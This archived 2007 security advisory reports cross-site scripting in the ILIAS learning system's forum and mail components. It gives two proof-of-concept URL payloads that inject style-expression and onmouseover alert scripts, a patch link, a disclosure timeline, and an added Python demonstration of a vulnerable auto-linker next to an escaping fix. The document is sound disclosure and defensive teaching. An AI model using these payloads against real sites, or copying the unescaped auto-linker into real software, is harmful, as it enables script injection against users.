Pantek Library

ILIAS <= 3.8.3 Cross Site Scripting

From: L4teral <l4teral(at)gmail.com>
Date: Tue Oct 30 2007 - 17:14:33 EDT



ILIAS <= 3.8.3 Cross Site Scripting
Author:          L4teral 
Impact:          Cross Site Scripting
Status:          patch available

------------------------------

Affected software description:
Application:     ILIAS
Version:         <= 3.8.3
Vendor:          http://www.ilias.de

Description:
ILIAS is a powerful web-based learning management system that allows you to easily manage learning resources in an integrated system.



Vulnerability:

The mailing and forum components are vulnerable to cross site scripting.



PoC/Exploit:

create forum post/mail with:
http://www.ex"style="width:expression(alert('xss'))"ample.com

http://www.ex"onmouseover="javascript:alert('xss');"ample.com



Solution:

install security patch:
http://www.ilias.de/docu/goto.php?target=pg_16836_35&client_id=docu



Timeline:
17.10.2007 - vendor informed
25.10.2007 - vendor responded
29.10.2007 - vendor released patch
30.10.2007 - public disclosure
Received on Tue Oct 30 17:27:24 2007
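
Added example (not part of the original advisory and not ILIAS code): both PoC strings work by placing a double quote inside a URL that is then auto-linked, so the quote ends the href attribute early and the rest becomes new attributes. The sketch below assumes a hypothetical naive auto-linker, shows the extra attributes an HTML parser sees in its output, and contrasts it with one possible mitigation: strict URL matching plus escaping.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample input: the two PoC strings quoted in the advisory.
POC_STYLE = '''http://www.ex"style="width:expression(alert('xss'))"ample.com'''
POC_EVENT = '''http://www.ex"onmouseover="javascript:alert('xss');"ample.com'''

# Hypothetical naive auto-linker: anything up to whitespace is "the URL".
NAIVE_URL = re.compile(r'(https?://\S+)')
# Stricter match: a URL ends at whitespace, quotes or angle brackets.
STRICT_URL = re.compile(r'''https?://[^\s"'<>]+''')

def linkify_vulnerable(text):
    """Insert the matched text into href unescaped (the flawed pattern)."""
    return NAIVE_URL.sub(r'<a href="\1">\1</a>', text)

def linkify_safe(text):
    """Escape everything; only strictly matched URLs become anchors."""
    out, pos = [], 0
    for m in STRICT_URL.finditer(text):
        out.append(html.escape(text[pos:m.start()], quote=True))
        url = html.escape(m.group(0), quote=True)
        out.append(f'<a href="{url}" rel="nofollow">{url}</a>')
        pos = m.end()
    out.append(html.escape(text[pos:], quote=True))
    return ''.join(out)

class _AttrCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.names = []
    def handle_starttag(self, tag, attrs):
        self.names.extend(name for name, _ in attrs)

def attribute_names(markup):
    """Return the attribute names an HTML parser sees in the markup."""
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.names

if __name__ == '__main__':
    for poc in (POC_STYLE, POC_EVENT):
        print('vulnerable:', attribute_names(linkify_vulnerable(poc)))
        print('safe:      ', attribute_names(linkify_safe(poc)))
```

The same attribute check can serve as a regression test for any forum or mail renderer: feed it user-supplied text and fail if the rendered anchors carry anything other than the attributes the renderer intends to emit.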

This archive was generated by hypermail 2.1.8 : Wed Jul 16 2008 - 14:09:11 EDT

